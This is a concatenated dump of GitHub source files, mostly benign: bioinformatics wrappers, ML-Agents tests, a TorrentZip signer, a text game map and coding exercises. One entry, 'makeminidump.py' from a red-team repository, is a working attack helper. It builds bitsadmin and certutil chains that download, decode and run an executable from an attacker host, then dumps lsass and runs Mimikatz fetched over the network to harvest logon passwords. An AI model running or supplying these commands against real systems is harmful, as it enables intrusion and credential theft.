rg_name=None):\n \"\"\"Perform a BWA alignment, generating a SAM file.\n \"\"\"\n sai1_file = os.path.join(align_dir, \"%s_1.sai\" % out_base)\n sai2_file = (os.path.join(align_dir, \"%s_2.sai\" % out_base)\n if pair_file else None)\n sam_file = os.path.join(align_dir, \"%s.sam\" % out_base)\n if not file_exists(sam_file):\n if not file_exists(sai1_file):\n with file_transaction(sai1_file) as tx_sai1_file:\n _run_bwa_align(fastq_file, ref_file, tx_sai1_file, config)\n if sai2_file and not file_exists(sai2_file):\n with file_transaction(sai2_file) as tx_sai2_file:\n _run_bwa_align(pair_file, ref_file, tx_sai2_file, config)\n align_type = \"sampe\" if sai2_file else \"samse\"\n sam_cl = [config_utils.get_program(\"bwa\", config), align_type, ref_file, sai1_file]\n if sai2_file:\n sam_cl.append(sai2_file)\n sam_cl.append(fastq_file)\n if sai2_file:\n sam_cl.append(pair_file)\n with file_transaction(sam_file) as tx_sam_file:\n with open(tx_sam_file, \"w\") as out_handle:\n logger.info(\" \".join(sam_cl))\n subprocess.check_call(sam_cl, stdout=out_handle)\n return sam_file\n\ndef _bwa_args_from_config(config):\n cores = config.get(\"resources\", {}).get(\"bwa\", {}).get(\"cores\", None)\n core_flags = [\"-t\", str(cores)] if cores else []\n qual_format = config[\"algorithm\"].get(\"quality_format\", \"\").lower()\n qual_flags = [\"-I\"] if qual_format == \"illumina\" else []\n return core_flags + qual_flags\n\ndef _run_bwa_align(fastq_file, ref_file, out_file, config):\n aln_cl = [config_utils.get_program(\"bwa\", config), \"aln\",\n \"-n %s\" % config[\"algorithm\"][\"max_errors\"],\n \"-k %s\" % config[\"algorithm\"][\"max_errors\"]]\n aln_cl += _bwa_args_from_config(config)\n aln_cl += [ref_file, fastq_file]\n with open(out_file, \"w\") as out_handle:\n logger.info(\" \".join(aln_cl))\n subprocess.check_call(aln_cl, stdout=out_handle)\n\n","repo_name":"chapmanb/bcbb","sub_path":"nextgen/bcbio/ngsalign/bwa.py","file_name":"bwa.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"48"} +{"seq_id":"71704774547","text":"\"\"\" Given an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\n\nA subarray is a contiguous part of an array. \"\"\"\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n # set value for maximum sum and the current sum\n max_sum = nums[0]\n curr_sum = 0\n \n # loop over nums and calculate curr_sum and max_sum\n for num in nums:\n # if the sum is a negative value, we don't want to keep it\n if curr_sum < 0:\n curr_sum = 0\n # add the next num \n curr_sum += num\n # find the max sum\n max_sum = max(max_sum, curr_sum)\n \n return max_sum\n ","repo_name":"kotynskm/leetcode","sub_path":"maxsubarray.py","file_name":"maxsubarray.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31308469940","text":"import pytest\nimport yaml\nfrom unittest.mock import MagicMock, patch, mock_open\nfrom mlagents.trainers import learn\nfrom mlagents.trainers.trainer_controller import TrainerController\nfrom mlagents.trainers.learn import parse_command_line\nfrom mlagents.trainers.cli_utils import DetectDefault\nfrom mlagents_envs.exception import UnityEnvironmentException\nfrom mlagents.trainers.stats import StatsReporter\nfrom mlagents.trainers.environment_parameter_manager import EnvironmentParameterManager\nimport os.path\n\n\ndef basic_options(extra_args=None):\n extra_args = extra_args or {}\n args = [\"basic_path\"]\n if extra_args:\n args += [f\"{k}={v}\" for k, v in extra_args.items()]\n return parse_command_line(args)\n\n\nMOCK_YAML = \"\"\"\n behaviors:\n {}\n \"\"\"\n\nMOCK_INITIALIZE_YAML = \"\"\"\n behaviors:\n {}\n checkpoint_settings:\n initialize_from: notuselessrun\n \"\"\"\n\nMOCK_PARAMETER_YAML = \"\"\"\n behaviors:\n {}\n env_settings:\n env_path: \"./oldenvfile\"\n num_envs: 4\n num_areas: 4\n base_port: 4001\n seed: 9870\n checkpoint_settings:\n run_id: uselessrun\n initialize_from: notuselessrun\n debug: false\n \"\"\"\n\n\n@patch(\"mlagents.trainers.learn.write_timing_tree\")\n@patch(\"mlagents.trainers.learn.write_run_options\")\n@patch(\"mlagents.trainers.learn.validate_existing_directories\")\n@patch(\"mlagents.trainers.learn.TrainerFactory\")\n@patch(\"mlagents.trainers.learn.SubprocessEnvManager\")\n@patch(\"mlagents.trainers.learn.create_environment_factory\")\n@patch(\"mlagents.trainers.settings.load_config\")\ndef test_run_training(\n load_config,\n create_environment_factory,\n subproc_env_mock,\n trainer_factory_mock,\n handle_dir_mock,\n write_run_options_mock,\n write_timing_tree_mock,\n):\n mock_env = MagicMock()\n mock_env.external_brain_names = []\n mock_env.academy_name = \"TestAcademyName\"\n create_environment_factory.return_value = mock_env\n load_config.return_value = yaml.safe_load(MOCK_INITIALIZE_YAML)\n mock_param_manager = MagicMock(return_value=\"mock_param_manager\")\n mock_init = MagicMock(return_value=None)\n with patch.object(EnvironmentParameterManager, \"__new__\", mock_param_manager):\n with patch.object(TrainerController, \"__init__\", mock_init):\n with patch.object(TrainerController, \"start_learning\", MagicMock()):\n options = basic_options()\n learn.run_training(0, options, 1)\n mock_init.assert_called_once_with(\n trainer_factory_mock.return_value,\n os.path.join(\"results\", \"ppo\"),\n \"ppo\",\n \"mock_param_manager\",\n True,\n 0,\n )\n handle_dir_mock.assert_called_once_with(\n os.path.join(\"results\", \"ppo\"),\n False,\n False,\n os.path.join(\"results\", \"notuselessrun\"),\n )\n write_timing_tree_mock.assert_called_once_with(\n os.path.join(\"results\", \"ppo\", \"run_logs\")\n )\n write_run_options_mock.assert_called_once_with(\n os.path.join(\"results\", \"ppo\"), options\n )\n StatsReporter.writers.clear() # make sure there aren't any writers as added by learn.py\n\n\ndef test_bad_env_path():\n with pytest.raises(UnityEnvironmentException):\n factory = learn.create_environment_factory(\n env_path=\"/foo/bar\",\n no_graphics=True,\n seed=-1,\n num_areas=1,\n timeout_wait=1,\n start_port=8000,\n env_args=None,\n log_folder=\"results/log_folder\",\n )\n factory(worker_id=-1, side_channels=[])\n\n\n@patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_YAML)\ndef test_commandline_args(mock_file):\n # No args raises\n # with pytest.raises(SystemExit):\n # parse_command_line([])\n # Test with defaults\n opt = parse_command_line([\"mytrainerpath\"])\n assert opt.behaviors == {}\n assert opt.env_settings.env_path is None\n assert opt.checkpoint_settings.resume is False\n assert opt.checkpoint_settings.inference is False\n assert opt.checkpoint_settings.run_id == \"ppo\"\n assert opt.checkpoint_settings.initialize_from is None\n assert opt.env_settings.seed == -1\n assert opt.env_settings.base_port == 5005\n assert opt.env_settings.num_envs == 1\n assert opt.env_settings.num_areas == 1\n assert opt.engine_settings.no_graphics is False\n assert opt.debug is False\n assert opt.env_settings.env_args is None\n\n full_args = [\n \"mytrainerpath\",\n \"--env=./myenvfile\",\n \"--inference\",\n \"--run-id=myawesomerun\",\n \"--seed=7890\",\n \"--train\",\n \"--base-port=4004\",\n \"--initialize-from=testdir\",\n \"--num-envs=2\",\n \"--num-areas=2\",\n \"--no-graphics\",\n \"--debug\",\n ]\n\n opt = parse_command_line(full_args)\n assert opt.behaviors == {}\n assert opt.env_settings.env_path == \"./myenvfile\"\n assert opt.checkpoint_settings.run_id == \"myawesomerun\"\n assert opt.checkpoint_settings.initialize_from == \"testdir\"\n assert opt.env_settings.seed == 7890\n assert opt.env_settings.base_port == 4004\n assert opt.env_settings.num_envs == 2\n assert opt.env_settings.num_areas == 2\n assert opt.engine_settings.no_graphics is True\n assert opt.debug is True\n assert opt.checkpoint_settings.inference is True\n assert opt.checkpoint_settings.resume is False\n\n # ignore init if resume is set\n full_args.append(\"--resume\")\n opt = parse_command_line(full_args)\n assert opt.checkpoint_settings.initialize_from is None # ignore init if resume set\n assert opt.checkpoint_settings.resume is True\n\n\n@patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_PARAMETER_YAML)\ndef test_yaml_args(mock_file):\n # Test with opts loaded from YAML\n DetectDefault.non_default_args.clear()\n opt = parse_command_line([\"mytrainerpath\"])\n assert opt.behaviors == {}\n assert opt.env_settings.env_path == \"./oldenvfile\"\n assert opt.checkpoint_settings.run_id == \"uselessrun\"\n assert opt.checkpoint_settings.initialize_from == \"notuselessrun\"\n assert opt.env_settings.seed == 9870\n assert opt.env_settings.base_port == 4001\n assert opt.env_settings.num_envs == 4\n assert opt.env_settings.num_areas == 4\n assert opt.engine_settings.no_graphics is False\n assert opt.debug is False\n assert opt.env_settings.env_args is None\n # Test that CLI overrides YAML\n full_args = [\n \"mytrainerpath\",\n \"--env=./myenvfile\",\n \"--resume\",\n \"--inference\",\n \"--run-id=myawesomerun\",\n \"--seed=7890\",\n \"--train\",\n \"--base-port=4004\",\n \"--num-envs=2\",\n \"--num-areas=2\",\n \"--no-graphics\",\n \"--debug\",\n \"--results-dir=myresults\",\n ]\n\n opt = parse_command_line(full_args)\n assert opt.behaviors == {}\n assert opt.env_settings.env_path == \"./myenvfile\"\n assert opt.checkpoint_settings.run_id == \"myawesomerun\"\n assert opt.env_settings.seed == 7890\n assert opt.env_settings.base_port == 4004\n assert opt.env_settings.num_envs == 2\n assert opt.env_settings.num_areas == 2\n assert opt.engine_settings.no_graphics is True\n assert opt.debug is True\n assert opt.checkpoint_settings.inference is True\n assert opt.checkpoint_settings.resume is True\n assert opt.checkpoint_settings.results_dir == \"myresults\"\n\n\n@patch(\"builtins.open\", new_callable=mock_open, read_data=MOCK_YAML)\ndef test_env_args(mock_file):\n full_args = [\n \"mytrainerpath\",\n \"--env=./myenvfile\",\n \"--env-args\", # Everything after here will be grouped in a list\n \"--foo=bar\",\n \"--blah\",\n \"baz\",\n \"100\",\n ]\n\n opt = parse_command_line(full_args)\n assert opt.env_settings.env_args == [\"--foo=bar\", \"--blah\", \"baz\", \"100\"]\n","repo_name":"Unity-Technologies/ml-agents","sub_path":"ml-agents/mlagents/trainers/tests/test_learn.py","file_name":"test_learn.py","file_ext":"py","file_size_in_byte":8038,"program_lang":"python","lang":"en","doc_type":"code","stars":15647,"dataset":"github-code","pt":"48"} +{"seq_id":"4116088458","text":"import os, struct, zipfile, zlib\n\nif __name__ == '__main__':\n from torrentarchive import TorrentArchive\nelse:\n from .torrentarchive import TorrentArchive\n\ndef log(*args):\n print('[TORRENTZIP]', *args)\n\ndef d(s):\n print(\"DEBUG: %s\" % s)\n\ndef e(s):\n print(\"ERROR: %s\" % s)\n\nclass TorrentZip(TorrentArchive):\n def __init__(self, archive_filename):\n super().__init__(archive_filename)\n \n # Collect contents\n z = zipfile.ZipFile(archive_filename, mode='r')\n entries = []\n dir_count = 0\n file_count = 0\n # infolist() maintains archive order\n for f in z.infolist():\n if f.is_dir():\n dir_count += 1\n type = 'dir'\n else:\n file_count += 1\n type = 'reg'\n entries.append({'path': f.filename, 'size': f.file_size, 'type': type})\n\n self.contents = {'entries': entries, 'dir_count': dir_count, 'file_count': file_count}\n\n def signature_is_present(self, filename=None):\n if not filename:\n filename = self.archive_filename\n with open(filename, \"rb\") as f:\n f.seek(-22, os.SEEK_END)\n buf = f.read(13)\n if not buf:\n return False\n return struct.unpack(\"<13s\", buf)[0] == b'TORRENTZIPPED'\n\n def signature_is_valid(self, filename=None):\n if not filename:\n filename = self.archive_filename\n current_sig = self._get_tzip_signature(filename)\n actual_sig = self._generate_signature(filename)\n return current_sig == actual_sig\n\n def get_archive_contents(self):\n return self.contents\n\n def sign(self, path=None):\n if not path:\n path = self.archive_filename\n\n current_sig = self._get_tzip_signature(path)\n actual_sig = self._generate_signature(path)\n\n if current_sig:\n if current_sig == actual_sig:\n print(\"Existing signature is valid; skipping signing\")\n return True\n else:\n print(\"Signature mismatch! Re-signing.\", current_sig, actual_sig)\n else:\n print(\"No signature present; signing.\")\n\n # update signature\n with open(path, 'r+b') as z:\n z.seek(-22, 2)\n z.write(struct.pack(\"<22s\", actual_sig))\n\n return True\n\n def _get_tzip_signature(self, filename):\n with open(filename, 'rb') as z:\n z.seek(-22, 2)\n sig = struct.unpack(\"<22s\", z.read(22))[0]\n if not sig.startswith(b'TORRENTZIPPED-'):\n return False\n return sig\n\n def _generate_signature(self, filename):\n zip64 = False\n if os.path.getsize(filename) > 0xFFFFFFFF:\n zip64 = True\n\n z = zipfile.ZipFile(filename, mode='r', allowZip64=True)\n\n # synthesize the central directory\n entries = z.infolist()\n all_records = b\"\"\n for e in entries:\n cd_file_size = e.file_size\n cd_compress_size = e.compress_size\n cd_header_offset = e.header_offset\n cd_volume = e.volume\n\n # extra field used for zip64 files (files that are >4G in size\n # or contain fields/offsets that exceed 4G)\n extra = b\"\"\n\n if e.file_size > 0xFFFFFFFF:\n cd_file_size = 0xFFFFFFFF\n extra += struct.pack(\" 0xFFFFFFFF:\n cd_compress_size = 0xFFFFFFFF\n extra += struct.pack(\" 0xFFFFFFFF:\n extra += struct.pack(\" 0xFFFF:\n cd_volume = 0xFFFF\n extra += struct.pack(\" nul && bitsadmin /complete %s && del %s && certutil -decode %s %s\"\n if proxy_steal == \"1\":\n certutilcombo_sub = \"bitsadmin /util /setieproxy networkservice AUTODETECT && \" + certutilcombo_sub\n\n certfilename = certutil_b64encode(runwebroot+exefilename)\n certfilepath_met = loadpath_met % randtxtname #certfilename\n certfilepath_cmd = loadpath_cmd % randtxtname #certfilename\n runfileroot = runwebroot + runfilename\n runfilepath_met = loadpath_met % randexename #runfilename\n runfilepath_cmd = loadpath_cmd % randexename #runfilename\n\n combo_one = certutilcombo % (lhost,certfilename,certfilepath_cmd,certfilepath_cmd,runfilepath_cmd)\n if custom_agent == \"0\":\n combo_one_sub = certutilcombo_sub % (bitsjobname,lhost,certfilename,certfilepath_cmd,runfilepath_cmd,certfilepath_cmd,runfilepath_cmd)\n if custom_agent == \"1\":\n combo_one_sub = certutilcombo_sub % (bitsjobname,bitsjobname,agent_string,bitsjobname,lhost,certfilename,certfilepath_cmd,bitsjobname,bitsjobname,runfilepath_cmd,certfilepath_cmd,runfilepath_cmd)\n combo_two = utilpath % (runfilepath_cmd) # no need to pass args\n combo_break = combo_one + \" && \" + combo_two\n combo_break_sub = combo_one_sub + \" && \" + combo_two\n\n copy(certfilename,runwebroot,certfilename)\n print('[*] upload:\\nupload %s %s' % (runfileroot,runfilepath_met)) \n print(combo_one)\n print(combo_one_sub)\n print('[*] check:\\ndir %s' % (runfilepath_cmd))\n print('[*] use (only with admin privileges!):\\n%s ' % (combo_two))\n print('[!] c-c-c-combo breaker (cmd only!) (only with admin privileges!) (sub):\\n%s' % combo_break_sub)\n \n return combo_break,combo_break_sub\n pass\n\ndef makeminidump(bitness,lhost):\n print('[!] warning! run only with admin priv!')\n minidumpfilename,dumpfilepath = writeminidump()\n dumpfilepath = dumpfilepath.replace('\\\\\\\\','\\\\')\n csfilepath = \"/home/kali/data/MiniDump/MiniDump/\"\n csfilename = \"Program.cs\"\n exewebroot = \"/var/www/html/\"\n exefilename = \"MiniDump.exe\"\n\n copy(minidumpfilename,csfilepath,csfilename)\n input(\"[!] build %s%s with bitness %s .. press enter to continue\\n\" % (csfilepath,csfilename,bitness))\n if bitness == \"64\":\n copy(\"%sbin/x64/Release/%s\" % (csfilepath,exefilename),exewebroot,exefilename)\n if bitness == \"32\":\n copy(\"%sbin/x86/Release/%s\" % (csfilepath,exefilename),exewebroot,exefilename)\n\n makecombo_minidump(lhost,exefilename)\n #print('[*] usage:\\n.\\\\MiniDump.exe')\n print('[!] check dump:\\ndir %s' % dumpfilepath)\n print('[!] dump lsass (on windows!):\\ndownload %s\\ncp lsass.dmp /var/www/html/\\nwget -uri http://%s/lsass.dmp -OutFile C:\\\\tools\\\\lsass.dmp\\niex(new-object net.webclient).downloadstring(\\'http://%s/kiwi.txt\\')\\nInvoke-Mimikatz -Command \"`\"sekurlsa::minidump c:\\\\tools\\\\lsass.dmp`\" sekurlsa::logonpasswords\" > c:\\\\tools\\\\dump.txt\\ntype c:\\\\tools\\\\dump.txt' % (dumpfilepath,devhost,devhost))\n\n pass\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--arch','-a',required=True,dest='arch',help='32 or 64')\n parser.add_argument('--lhost','-l',required=True,dest='host',help='lhost')\n args = parser.parse_args()\n \n bitness = args.arch\n lhost = args.host\n\n makeminidump(bitness,lhost)","repo_name":"6vr/Red-Team-Tips","sub_path":"make/makeminidump.py","file_name":"makeminidump.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"37187155729","text":"from story import *\n\nclass Map:\n\tdef __init__(self):\n\t\tself.map = [\n\t\t\t[Start(),\t\tSpider1(),Wasp2(), Knife(), \t\tNone\t\t],\n\t\t\t[None, \t\t\tChest1(),\tNone, \t\tSnake3(), Ant4()\t],\n\t\t\t[Key1(),\t\tNone, \t\tSpring(), Chest1(), Crow5()\t],\n\t\t\t[Beetle6(),\tNone, \t\tNone, \t\tNone, \t\tBrPlate()\t],\n\t\t\t[Axe(), \t\tNone, \t\tChest2(),\tPath2(), \tPath1()\t],\n\t\t\t[DoorS(), \tPath3(), \tSpring(), None, \t\tNone\t\t],\n\t\t\t[Ape7(),\t\tNone, \t\tNone, \t\tNone,\t\t\tNone\t\t],\n\t\t\t[Spring(),\tSpider8(),Spider1(),None, \t\tEnd()\t\t],\n\t\t]\n\t\n\tdef content_at(self, x, y):\n\t\treturn self.map[y][x]\n\t\n\tdef is_valid(self, x, y):\n\t\twidth = len(self.map[0])\n\t\theight = len(self.map)\n\t\treturn (0 <= x < width) and (0 <= y < height) and (self.map[y][x] != None)\n\t\n\tdef possible_directions_from(self, x, y):\n\t\tdirections = []\n\t\tif self.is_valid(x, y-1):\n\t\t\tdirections.append('north')\n\t\tif self.is_valid(x, y+1):\n\t\t\tdirections.append('south')\n\t\tif self.is_valid(x-1, y):\n\t\t\tdirections.append('west')\n\t\tif self.is_valid(x+1, y):\n\t\t\tdirections.append('east')\n\t\t\t\n\t\tcontent = self.content_at(x, y)\n\t\tif isinstance(content, Door) and not content.is_done:\n\t\t\tdirections.remove(content.direction)\n\t\t\t\n\t\treturn directions\n\t\n\tdef __str__(self):\n\t\treturn self.map_str()\n\t\n\tdef map_str(self, x=None, y=None, mode='explore'):\n\t\t'''\n\t\tThere are three modes:\n\t\t- 'explore': Default mode. Only shows what the player has already explored.\n\t\t- 'outline': Cheat. Same as 'explore', but shows all walls.\n\t\t- 'reveal': Cheat. Shows the whole map.\n\t\t'''\n\t\tmap_str = '\\n'\n\t\tfor i, row in enumerate(self.map):\n\t\t\tfor j, content in enumerate(row):\n\t\t\t\tif not content:\n\t\t\t\t\tif self.has_explored_neighbors(j, i) or mode == 'outline' or mode == 'reveal':\n\t\t\t\t\t\tmap_str += '####### '\n\t\t\t\t\telse:\n\t\t\t\t\t\tmap_str += '??????? '\n\t\t\t\telse:\n\t\t\t\t\tdisplay = type(content).__name__\n\t\t\t\t\tdisplay = display + ((8-len(display))*' ')\n\t\t\t\t\tif i == y and j == x:\n\t\t\t\t\t\tdisplay = 'YOU '\n\t\t\t\t\telif not content.is_explored and not mode == 'reveal':\n\t\t\t\t\t\tdisplay = '??????? '\n\t\t\t\t\telse:\n\t\t\t\t\t\tdisplay = type(content).__name__\n\t\t\t\t\t\tdisplay = display + ((8-len(display))*' ')\n\t\t\t\t\tmap_str += display\n\t\t\tmap_str += '\\n'\n\t\treturn map_str\n\t\t\n\tdef has_explored_neighbors(self, x, y):\n\t\tfor i in range(y-1, y+2):\n\t\t\tfor j in range(x-1, x+2):\n\t\t\t\tif self.is_valid(j, i):\n\t\t\t\t\tif self.map[i][j].is_explored:\n\t\t\t\t\t\treturn True\n\t\treturn False\n","repo_name":"lewisbar/Text-Adventure-2","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73736500307","text":"#!/home/apprenant/PycharmProject/Decorateur/venv/bin/python3.5\n\nimport sys\n\ntry:\n user = sys.argv[1]\nexcept IndexError as err:\n print(\"Error\")\n print(err)\n exit(1)\n\nright = (\n ['Michel', 'Marion'],\n ['Paul', 'Cassandre', 'Olivier'],\n ['Lucy']\n)\n\ndef right_to_int():\n if right == 'user':\n return 0\n elif right == 'admin':\n return 1\n else:\n return 2\n\ndef show_error():\n echo(\"error page\")\n\n@auth_decorator(\"user\")\ndef say_hello():\n echo(\"Hello\")\n\n@auth_decorator(\"admin\")\ndef show_page():\n echo(\"pages\")\n\n@auth_decorator('root')\ndef show_root():\n echo(\"root\")\n\n\n\n\"\"\"\ndef auth(func_display_page, user):\n print(\"Entering fdecorator\")\n print(func_display_page)\n\n def fdecorate(user):\n print('Entering fdecorate')\n return func_display_page(user)\n\n print(\"outgoing auth\")\n return fdecorate\n\n\n\ndef display_page(page):\n print(\"Entering display_page\")\n print(page)\n\n\ndisplay_page('OK')\n\"\"\"\n","repo_name":"lucyjosef/Decorator_python","sub_path":"Auth_decorator.py","file_name":"Auth_decorator.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4952336831","text":"# a recursive function that computes and returns the number of digits in given input non-negative integer.\n\ndef count_digits(n):\n '''(int)->int\n Returns the number of digits in n\n Precondition: n a non-negative integer\n '''\n count=0\n rest_of_digits = n // 10\n if rest_of_digits == 0:\n count= 1\n else:\n count = 1 + count_digits(rest_of_digits)\n \n return count\n\n\n# this is the same ... just has few less lines of code\n\ndef count_digits_v2(n):\n '''(int)->int\n Returns the number of digits in n\n Precondition: n a non-negative integer\n '''\n rest_of_digits = n // 10\n if rest_of_digits == 0:\n return 1\n else:\n return 1 + count_digits(rest_of_digits)\n","repo_name":"NicholasAllair/ITI1120","sub_path":"Labs/lab11-solutions/prog_ex2.py","file_name":"prog_ex2.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31869878381","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"mylisting\", views.mylisting, name=\"mylisting\"),\n path(\"mybids\", views.mybids, name=\"mybids\"),\n path(\"listingview/\", views.listings, name=\"listingview\"),\n path(\"bid/\", views.bid, name=\"bid\"),\n]\n","repo_name":"sauravadhikary/nefolisell","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20788081684","text":"from unittest import TestCase\nfrom clayrs.content_analyzer.ratings_manager.score_processor import NumberNormalizer\n\n\nclass TestNumberNormalizer(TestCase):\n def test_fit(self):\n scores = [1, 2, 5, 5, 3, 3.5, 3.6, 3.7, 3.8, 3.9, 4.0, 10]\n\n result = []\n for score in scores:\n converted = NumberNormalizer(scale=(1, 10)).fit(score)\n result.append(converted)\n\n expected = [-1.0, -0.77777777, -0.11111111, -0.11111111,\n -0.55555555, -0.44444444, -0.42222222, -0.39999999,\n -0.37777777, -0.35555555, -0.33333333, 1.0]\n\n for expected_score, result_score in zip(expected, result):\n self.assertAlmostEqual(expected_score, result_score)\n\n # Test with rounding at the fourth digit\n result_rounded = []\n for score in scores:\n converted_rounded = NumberNormalizer(scale=(1, 10), decimal_rounding=4).fit(score)\n result_rounded.append(converted_rounded)\n\n expected_rounded = [-1.0, -0.7778, -0.1111, -0.1111, -0.5556,\n -0.4444, -0.4222, -0.4, -0.3778, -0.3556,\n -0.3333, 1.0]\n\n for expected_score_rounded, result_score_rounded in zip(expected_rounded, result_rounded):\n self.assertAlmostEqual(expected_score_rounded, result_score_rounded)\n\n def test_error(self):\n\n # 2 numbers must be passed\n with self.assertRaises(ValueError):\n NumberNormalizer(scale=(1,))\n\n with self.assertRaises(ValueError):\n NumberNormalizer(scale=(1, 2, 3))\n","repo_name":"swapUniba/ClayRS","sub_path":"test/content_analyzer/ratings_manager/test_rating_processor.py","file_name":"test_rating_processor.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"13001863238","text":"import sys\nsys.stdin = open(\"D8_1634_input.txt\", \"r\")\n\ndef dfs(s, e):\n if visited[ord(s) - 97] == 1:\n return 0\n visited[ord(s) - 97] = 1\n for i in alpha[ord(s) - 97]:\n if i == e:\n return 1\n else:\n if dfs(i, e):\n return 1\n return 0\n\n\nT = int(input())\nfor test_case in range(T):\n M, N = map(int, input().split())\n alpha = [[] for _ in range(26)]\n\n for _ in range(M):\n x, y = input().split()\n alpha[ord(x) - 97].append(y)\n\n print(\"#{}\".format(test_case + 1))\n for _ in range(N):\n a, b = input().split()\n if len(a) != len(b):\n print(\"no\")\n continue\n chk = 1\n for i in range(len(a)):\n visited = [0] * 26\n if a[i] != b[i]:\n if not dfs(a[i], b[i]):\n chk = 0\n break\n if chk:\n print(\"yes\")\n else:\n print(\"no\")","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D8_1634.py","file_name":"D8_1634.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71728441106","text":"\ndef read_input(file_name):\n file = open(file_name, 'r')\n instructions = []\n for line in file:\n line = line.strip()\n inst = [x.strip() for x in line.split('=')]\n instructions.append(tuple(inst))\n return instructions\n\n\ndef apply_mask(mask, val):\n for i in range(len(mask)):\n if mask[i] == \"X\":\n continue\n else:\n val = val[:i] + mask[i] + val[i+1:]\n return val\n\n\ndef apply_mem_mask(mask, mem_adr):\n floaters = []\n for i in range(len(mask)):\n if mask[i] == \"0\":\n continue\n elif mask[i] == \"1\":\n mem_adr = mem_adr[:i] + mask[i] + mem_adr[i+1:]\n else:\n floaters.append(i)\n floating_adrs = []\n for i in range(pow(2, len(floaters))):\n bin_val = bin(i)[2:]\n temp = mem_adr\n offset = 0\n for ind, f_ind in enumerate(floaters):\n if (len(floaters) - 1) - ind >= len(bin_val):\n temp = temp[:f_ind] + '0' + temp[f_ind + 1:]\n offset += 1\n else:\n temp = temp[:f_ind] + bin_val[ind - offset] + temp[f_ind + 1:]\n floating_adrs.append(temp)\n return floating_adrs\n\n\ndef part1(instructions):\n mask = \"\"\n mem = [\"\" for i in range(100000)]\n for inst in instructions:\n if inst[0] == \"mask\":\n mask = inst[1]\n else:\n mem_adr = int(inst[0][4:-1])\n val = format(int(inst[1]), '#038b')[2:]\n m_val = apply_mask(mask, val)\n mem[mem_adr] = m_val\n total = 0\n for val in mem:\n if val != \"\":\n total += int(val, 2)\n return total\n\n\ndef part2(instructions):\n mask = \"\"\n mem = {}\n for inst in instructions:\n if inst[0] == \"mask\":\n mask = inst[1]\n else:\n mem_adr = format(int(inst[0][4:-1]), '#038b')[2:]\n val = int(inst[1])\n mem_adrs = apply_mem_mask(mask, mem_adr)\n for adr in mem_adrs:\n mem[int(adr, 2)] = val\n total = 0\n for val in mem.values():\n if val != \"\":\n total += int(val)\n return total\n\n\ndef main():\n file_name = \"Part1Input.txt\"\n instructions = read_input(file_name)\n print(part1(instructions))\n print(part2(instructions))\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZacharyRJohnson/Advent-of-Code","sub_path":"2020/Day14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17330490334","text":"# -*- coding: utf-8 -*-\nwhile True:\n n = int(input())\n lista = []\n lista2 = 0\n if n == 0:\n break\n else:\n for i in range(n):\n c, v = map(int,input().split())\n for o in range(v):\n lista.append(c)\n for u in set(lista):\n if lista.count(u)>=2:\n lista2 += int(lista.count(u)//2)\n print(int(lista2/2))\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1366.py","file_name":"1366.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11025913123","text":"#아래 클래스에 해당하는 정보들을 json 파일에서 추출하는 코드\n\nimport json\nimport os\n\nclasses = ['43기념관', '518민주묘지상징탑', '63빌딩', '83타워', '경주타워', \n '공산정', '광개토대왕동상', '광안대교', '국립과천과학관', '국립산악박물관', \n '국립세종도서관', '근대역사박물관', '김대중노벨평화상기념관', '남산��워', '롯데월드타워', \n '백남준아트센터', '부산타워', '송도G타워', '송도포스코타워', '여수세계박람회스카이타워', \n '영도대교', '율곡이이동상', '이순신장군동상', '인천대교', '첨성대', \n '풍남문', '하멜등대', '한빛탑', '해운대아이파크', '호미곶등대']\n\nLandmarks = dict()\n\nbase_path = \"../랜드마크\" #jpg, json이 저장되어있는 raw dataset directory\nfor _class in classes:\n #json 파일 찾아서 정보 가져오기\n class_path = os.path.join(base_path, _class)\n\n #json 파일 아무거나 가져오기\n json_path = \"\"\n for _file in os.listdir(class_path):\n if _file[-4:] == \"json\":\n json_path = os.path.join(class_path, _file)\n break\n \n #json 파일에서 가져온 정보로 각 class마다 dictionary 만들기 \n tmp = dict()\n with open(json_path, \"r\") as j:\n info = json.load(j)\n tmp[\"name\"] = info['regions'][0]['tags'][5][9:]\n tmp[\"description\"] = info['regions'][0]['sem_ext'][0]['value']\n tmp[\"address\"] = info[\"regions\"][0]['sem_ext'][1]['value']\n 